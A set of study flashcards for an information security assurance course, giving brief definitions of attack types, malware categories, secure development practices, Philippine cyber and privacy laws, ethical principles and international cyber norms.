IS ASSURANCE W5-6 Flashcards

1
Q

Compliance and Trust:

A

Regulatory compliance
Risk management:
Building trust

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Helps organizations meet data privacy regulations and industry standards,avoiding hefty fines and legal repercussions.

A

Regulatory compliance:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Proactive identification and mitigation of security vulnerabilities,minimizing potential damage from cyberattacks.

A

Risk management:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Demonstrates to stakeholders,customers,and partners a commitment to protecting their data,boosting overall reputation and confidence.

A

Building trust:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Operational Efficiency and Effectiveness:

A

Improved decision-making:
Resilient infrastructure:
Cost savings:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Ensures data accuracy and integrity,leading to sound business decisions based on reliable information.

A

Improved decision-making:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Minimizes downtime and disruptions caused by security incidents,maintaining operational continuity.

A

Resilient infrastructure:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Prevents financial losses from data breaches,ransomware attacks,and regulatory fines.

A

Cost savings:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Self-replicating programs that spread through systems,damaging files and disrupting operations.Ex:WannaCry ransomware attack.

A

Viruses

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Similar to viruses but propagate without user interaction.Ex:Morris Worm,which impacted early internet infrastructure.

A

Worms

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Encrypts files,demanding a ransom payment for decryption.Ex:Ryuk ransomware attack on hospitals.

A

Ransomware

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Disguised as legitimate software,granting attackers access once downloaded.Ex:Emotet malware used for data theft.

A

Trojan horses

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Targeted emails impersonating trusted individuals or organizations,tricking users into revealing sensitive information.

A

Spear phishing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Similar to phishing but uses SMS text messages.

A

Smishing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Uses phone calls to impersonate legitimate entities and exploit trust.

A

Vishing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Lures users with attractive offers or fake urgency to click malicious links or download attachments.

A

Baiting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Data Breaches:

A

SQL injection
Cross-site scripting (XSS)
Man-in-the-middle attacks:
Zero-day attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Exploiting vulnerabilities in database queries to steal data.

A

SQL injection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Injecting malicious scripts into websites to steal user data.

A

Cross-site scripting (XSS)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

Intercepting communication between users and websites to steal data.

A

Man-in-the-middle attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Exploiting unknown vulnerabilities before software vendors release patches.

A

Zero-day attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

Disgruntled employees stealing data or sabotaging systems.

A

Insider Threats:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Contractors or vendors with unauthorized access exploiting vulnerabilities.

A

Insider Threats:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

Deepfakes used for social engineering attacks.

A

Artificial Intelligence (AI):

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Insecure IoT devices creating entry points for attackers. Botnets formed from compromised IoT devices launching large-scale attacks.
Internet of Things (IoT):
26
While still in development, its potential to break current encryption methods poses a future challenge.
Quantum Computing:
27
Here are some key principles of secure software development:
Static Code Analysis: Continuous Security Testing: Security Awareness and Training:
28
Automated tools are used to scan code for potential security vulnerabilities before deployment. This helps catch issues early on and makes it easier to fix them.
Static Code Analysis:
29
Security testing is not a one-time event, but rather a continuous process that integrates with the development workflow. This includes automating security testing and integrating it into the build and deployment process.
Continuous Security Testing:
30
Developers need to be aware of security best practices and the latest threats. Regular training and awareness programs are essential for building a security-conscious development culture.
Security Awareness and Training:
31
Laws
Data Privacy Act of 2012 (DPA): Cybercrime Prevention Act of 2012 (CPA): Electronic Commerce Act of 2000 (ECA): Other Relevant Laws:
32
This landmark law regulates the collection, processing, and storage of personal information, empowering individuals with control over their data and requiring entities to implement reasonable security measures.
Data Privacy Act of 2012 (DPA):
33
This law criminalizes various cybercrimes, including hacking, data breaches, and cyberbullying.
Cybercrime Prevention Act of 2012 (CPA):
34
This law establishes the legal framework for electronic transactions, including provisions on data protection and electronic signatures.
Electronic Commerce Act of 2000 (ECA):
35
Several other laws touch upon information security, such as the Access Devices Regulation Act, Anti-Photo and Video Voyeurism Act, and Anti-Child Pornography Act.
Other Relevant Laws:
36
Ethical Considerations:
Balancing Privacy and Security Cyberbullying and Online Harassment: Digital Divide and Accessibility:
37
Similar to global concerns, striking a balance between individual privacy and national security remains a challenge. The Philippine government faces pressure to access data for security purposes, sometimes raising concerns about potential privacy violations.
Balancing Privacy and Security
38
38
The Philippines has a significant online harassment problem, and ethical considerations surround legal responses and platform responsibilities.
Cyberbullying and Online Harassment:
39
40
Ensuring equitable access to technology and digital literacy is crucial for ethical information security practices.
Digital Divide and Accessibility:
41
Enshrines basic ethical principles like accountability, public service, and integrity for public officials and employees.
1987 Philippine Constitution:
42
Establishes a code of conduct and ethical standards for public officials and employees.
Republic Act No. 6713
43
Mandates organizations to implement responsible data handling practices and safeguard personal information.
Data Privacy Act of 2012 (DPA):
44
Depending on the industry or sector, additional laws and regulations might influence ethical codes.
Other Relevant Laws:
45
Ethical Concerns in Information Security:
Privacy Surveillance Data Ownership and Control Algorithmic Bias: Vulnerability Disclosure: Cyberwarfare
46
Balancing the need for security with individual privacy rights is a major challenge. Collecting, storing, and using personal data ethically requires transparency, consent, and secure handling practices.
Privacy
47
Justifying and implementing surveillance activities ethically requires clear objectives, transparency, and respect for individual privacy.
Surveillance
48
Determining who owns and controls data, along with responsible data sharing practices, are crucial ethical considerations.
Data Ownership and Control: 
49
Ensuring algorithms used in information security systems are fair, unbiased, and do not discriminate against specific groups is ethically important.
Algorithmic Bias: 
50
Disclosing security vulnerabilities responsibly, balancing the need to inform affected parties with mitigating potential harm, poses ethical dilemmas.
Vulnerability Disclosure: 
51
 Ethical issues surround the use of cyber weapons, the targeting of civilian infrastructure, and the potential for unintended consequences.
Cyberwarfare
52
Ethical Principles for Information Security:
Privacy Transparency Accountability Fairness Proportionality Legality
53
Respect individual privacy rights by minimizing data collection, obtaining informed consent, and implementing robust security measures.
Privacy
54
Be transparent about data practices, including collection, use, and retention policies.
Transparency
55
Be accountable for data security and address breaches responsibly.
Accountability
56
 Treat all individuals fairly and avoid algorithmic bias in information security systems.
Fairness
57
Implement security measures proportionate to the risk and avoid overly intrusive practices.
Proportionality
58
Comply with relevant data privacy and security laws and regulations
Legality
59
Demonstrating a commitment to ethical information security practices builds trust with stakeholders and customers.
Enhanced Public Trust: 
60
Adhering to ethical principles helps organizations avoid legal repercussions associated with data breaches and privacy violations.
Reduced Legal Risks:
61
Ethical considerations can guide informed decisions about data handling, surveillance, and security measures.
Improved Decision-Making:
62
 Fostering an ethical culture within an organization encourages responsible behavior and contributes to stronger overall security.
Stronger Security Culture:
63
General Principles:
State sovereignty:  Non-intervention Proportional response:  Due diligence
64
Each state has the right to govern its own cyberspace and take measures to protect its critical infrastructure and information.
State sovereignty: 
65
No state should interfere with the legitimate activities of another state in cyberspace.
Non-intervention
66
Any use of force in response to a cyberattack must be necessary and proportionate to the harm suffered.
Proportional response: 
67
States have a duty to take reasonable measures to prevent their territory from being used for cyberattacks against other states.
Due diligence
68
Treaties and Agreements:
Budapest Convention on Cybercrime:  Convention on Certain Conventional Weapons (CCW):  International Telecommunication Union (ITU) Constitution and Regulations:  Various regional agreements: 
69
69
Focuses on criminalizing cyber offenses like illegal access, data interference, and computer fraud, promoting international cooperation in investigations and prosecutions.
Budapest Convention on Cybercrime:
70
Prohibits the use of or development of blinding laser weapons, potentially applicable to some cyberattacks causing physical harm.
Convention on Certain Conventional Weapons (CCW): 
71
Affirm the right to access and use information and communication technologies (ICTs) peacefully and responsibly.
International Telecommunication Union (ITU) Constitution and Regulations: 
72
 Additional treaties like the African Union Convention on Cyber Security and Personal Data Protection address regional concerns and cooperation frameworks.
Various regional agreements: 
73
Current Developments:
United Nations Group of Governmental Experts (GGE): Multistakeholder initiatives:
74
Regularly discusses and makes recommendations on norms, state behavior, and responsible use of ICTs in cyberspace.
United Nations Group of Governmental Experts (GGE):
75
Non-governmental organizations, businesses, and technical experts participate in developing best practices and norms for responsible cyber behavior.
Multistakeholder initiatives: